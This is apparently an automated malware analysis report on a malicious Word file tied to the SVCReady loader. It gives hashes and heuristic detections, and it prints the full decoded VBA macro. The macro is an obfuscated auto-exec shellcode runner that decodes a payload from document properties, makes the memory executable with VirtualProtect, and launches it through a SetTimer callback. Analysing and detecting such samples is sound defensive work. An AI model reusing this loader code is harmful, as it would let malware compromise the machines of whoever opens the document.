Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 c71fa657d1264aea…

MALICIOUS

Office (OOXML) / .DOC

Size: 2.62 MB
Created: 2022-06-16 23:45:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2022-06-20
MD5: 5bd1110589e70c5f9203a3a1d8839b1e
SHA-1: a496221115d08aabcbf5e09245544195cc8d543c
SHA-256: c71fa657d1264aeab2d3f657edc70a4455893d1cf7f3502adb7c7d4ca8e9335e
Risk Score: 310

Heuristics (9)

  • VBA project inside OOXML [medium] (6 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/bfOdbAduAS.bin)
  • VBA property-stored shellcode loader [critical] OLE_VBA_PROPERTY_SHELLCODE_LOADER
    VBA auto-exec macro takes the address (VarPtr) of a byte buffer decoded from a document property, marks memory executable (VirtualProtect/VirtualAlloc), and transfers control through a callback API (e.g. SetTimer/EnumWindows). The payload is hidden in the document properties rather than the macro source — the SVCReady loader pattern, a native shellcode runner rather than a parser CVE.
    Matched line in script
    Private Declare PtrSafe Function DucdameAnanta Lib "user32" Alias "SetTimer" (ByVal OvernobleNontheatricCrawliest As LongPtr, ByVal OveremploymentKaddishDeuteroprism As LongPtr, ByVal HeniquensGranulocyticJustified As LongPtr, ByVal UnaceticUnconvergingRidgels As LongPtr) As LongPtr
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    GetObject(ZFqgKX467Zy("jAlSdqDlp")).Environment(ZFqgKX467Zy("vjQh2YXnv3hU"))(ZFqgKX467Zy("iYEzZJvg8VdT")) = ActiveDocument.FullName
  • VBA project part renamed to evade filename detection [high] OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject(ZFqgKX467Zy("jAlSdqDlp")).Environment(ZFqgKX467Zy("vjQh2YXnv3hU"))(ZFqgKX467Zy("iYEzZJvg8VdT")) = ActiveDocument.FullName
  • VBA reads reversed config from document properties [high] OLE_VBA_REVERSED_DOCPROP_CONFIG
    VBA applies StrReverse to values read from the document's custom/built-in properties. Storing reversed configuration (URLs, CLSIDs, env-var names, payload names) in document properties keeps indicators out of the macro source — an obfuscation technique used by the SVCReady loader.
    Matched line in script
    ZFqgKX467Zy = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • OOXML part with non-standard content type and high-entropy data [high] OOXML_BOGUS_CUSTOM_PART
    The package declares a part with an invented content type (not an OpenXML/Office/standard media type) holding large, high-entropy (likely encrypted/packed) data. Legitimate OOXML files do not carry opaque binary blobs under custom content types; this is the embedded next-stage payload pattern used by loaders such as SVCReady.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL / Channel
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape | In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5293 bytes
SHA-256: 27b38d0da2e3acfb78f4c43a3fd08fb1a12b4a3dd599f5560d53ae8012899c0b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function DucdameAnanta Lib "user32" Alias "SetTimer" (ByVal OvernobleNontheatricCrawliest As LongPtr, ByVal OveremploymentKaddishDeuteroprism As LongPtr, ByVal HeniquensGranulocyticJustified As LongPtr, ByVal UnaceticUnconvergingRidgels As LongPtr) As LongPtr
Private Declare PtrSafe Function PrecriticalAequorinHouseboys Lib "kernel32" Alias "VirtualProtect" (ByVal SuckeredDefraudingPointedness As LongPtr, ByVal SemichiffonBarse As LongPtr, ByVal RamositiesUnism As LongPtr, HorseradishesWizeningTiddledywinks As LongPtr) As LongPtr
Private Declare PtrSafe Function SelloutDiscorporate Lib "user32" Alias "KillTimer" (ByVal IberianCoracoradialis As LongPtr, ByVal PremateTunga As LongPtr) As LongPtr
#Else
Private Declare Function DucdameAnanta Lib "user32" Alias "SetTimer" ( ByVal TsarismsMandarinshipPolycentric As Long, ByVal TchekaBasehearted As Long, ByVal EvulsionsSemiweekly As Long, ByVal CorsacReinvoked As Any) As Long
Private Declare Function PrecriticalAequorinHouseboys Lib "kernel32" Alias "VirtualProtect"  (ByVal ReadiedPhokomeliaOverfills As Long, ByVal ScheuchzeriaShiniestVaccary As Long, ByVal ExceptionabilityPurifying As Long, NearcticEvittateFieldfare As Long) As Long
Private Declare Function SelloutDiscorporate Lib "user32" Alias "KillTimer" ( ByVal GallicThanatometer As Long, ByVal GeodeticsOverspringPrecopulatory As Long) As Long
#End If
Private Sub Document_Open()
Dim CatallacticallyBankruptAgpaite() As Byte
#If Win64 Then
CatallacticallyBankruptAgpaite = SeisorChallenger(ActiveDocument.BuiltInDocumentProperties(ZFqgKX467Zy("reVHu90FnGWC")).Value)
#Else
CatallacticallyBankruptAgpaite = SeisorChallenger(ActiveDocument.BuiltInDocumentProperties(ZFqgKX467Zy("zY2Sgp")).Value)
#End If
#If VBA7 Then
Dim ReinstationGirgashite As LongPtr
Dim MisdefinesOxeateAquilia As LongPtr
Dim PaedomorphosisMandibulohyoid As LongPtr
Dim PreinvestigatorSlaggerZygnemataceous As LongPtr
#Else
Dim ReinstationGirgashite As Long
Dim MisdefinesOxeateAquilia As Long
Dim PaedomorphosisMandibulohyoid As Long
Dim PreinvestigatorSlaggerZygnemataceous As Long
#End If
MisdefinesOxeateAquilia = UBound(CatallacticallyBankruptAgpaite) + 1
PaedomorphosisMandibulohyoid = VarPtr(CatallacticallyBankruptAgpaite(0))
PrecriticalAequorinHouseboys PaedomorphosisMandibulohyoid, MisdefinesOxeateAquilia, 64, VarPtr(ReinstationGirgashite)
GetObject(ZFqgKX467Zy("jAlSdqDlp")).Environment(ZFqgKX467Zy("vjQh2YXnv3hU"))(ZFqgKX467Zy("iYEzZJvg8VdT")) = ActiveDocument.FullName
GetObject(ZFqgKX467Zy("dIys8xed48")).Environment(ZFqgKX467Zy("udxpfySMcTOGv"))(ZFqgKX467Zy("hpVwJQZn")) = ZFqgKX467Zy("gvGleLYFVA")
PreinvestigatorSlaggerZygnemataceous = DucdameAnanta(0, PaedomorphosisMandibulohyoid, 1, PaedomorphosisMandibulohyoid)
NonmonistDreadingArchitectress 1
SelloutDiscorporate 0, PreinvestigatorSlaggerZygnemataceous
GetObject(ZFqgKX467Zy("CkegJd8SjE4J")).Environment(ZFqgKX467Zy("IGOOLyweNo")).Remove (ZFqgKX467Zy("osg25K6KAJ"))
GetObject(ZFqgKX467Zy("xxpU8gqobCPNO")).Environment(ZFqgKX467Zy("LHPL8CLT")).Remove (ZFqgKX467Zy("mDVJuiju"))
ReDim CatallacticallyBankruptAgpaite(1)
End Sub
Sub NonmonistDreadingArchitectress(Finish)
Dim RadiometeorographCantonmentIridectomies As Long
Dim PacifisticallyMontpelierDowers As Long
PacifisticallyMontpelierDowers = Timer() + (Finish)
Do
RadiometeorographCantonmentIridectomies = Timer()
DoEvents
Loop Until RadiometeorographCantonmentIridectomies > PacifisticallyMontpelierDowers
End Sub
Function CurbstonerHeliograph(WedgeableParchmentizeCordwainery, OrodiagnosisOotocoidBauson)
CurbstonerHeliograph = Mid(WedgeableParchmentizeCordwainery, OrodiagnosisOotocoidBauson + 1, 1)
End Function
Public Function ZFqgKX467Zy(strInput)
ZFqgKX467Zy = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
End Function
Function NotodontidaeCilioretinalCoxalgia(CyprusesTotalitarianErratically) As Long
If Int(Rnd(23)) > 2 Then
NotodontidaeCilioretinalCoxalgia = 9000
Else
NotodontidaeCilioretinalCoxalgia = Len(CyprusesTotalitarianErratically)
End If
End Function
Function SeisorChallenger(SalveDowsabelsDisannuls)
ReDim UnexternalAntiannexationistFermentability(NotodontidaeCilioretinalCoxalgia(SalveDowsabelsDisannuls) - 1) As Byte
Dim ScolopendriumMantelpiecesAccentuate As Long, PreacherizeAlliterations As Long
Dim UnderreceiverStrawwork: UnderreceiverStrawwork = ZFqgKX467Zy("ZMLqk2KfT") & ZFqgKX467Zy("RzJ_TXWld")
For ScolopendriumMantelpiecesAccentuate = 0 To NotodontidaeCilioretinalCoxalgia(SalveDowsabelsDisannuls) - 1 Step 2
PreacherizeAlliterations = ScolopendriumMantelpiecesAccentuate / 2
UnexternalAntiannexationistFermentability(PreacherizeAlliterations) = CDec(UnderreceiverStrawwork & CurbstonerHeliograph(SalveDowsabelsDisannuls, ScolopendriumMantelpiecesAccentuate) & CurbstonerHeliograph(SalveDowsabelsDisannuls, ScolopendriumMantelpiecesAccentuate + 1))
Next
SeisorChallenger = UnexternalAntiannexationistFermentability
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/bfOdbAduAS.bin | 8704 bytes
SHA-256: dd19c8203868beb077504aaec5b61d99ae7cdd531d73cfb470084c7621bf34ff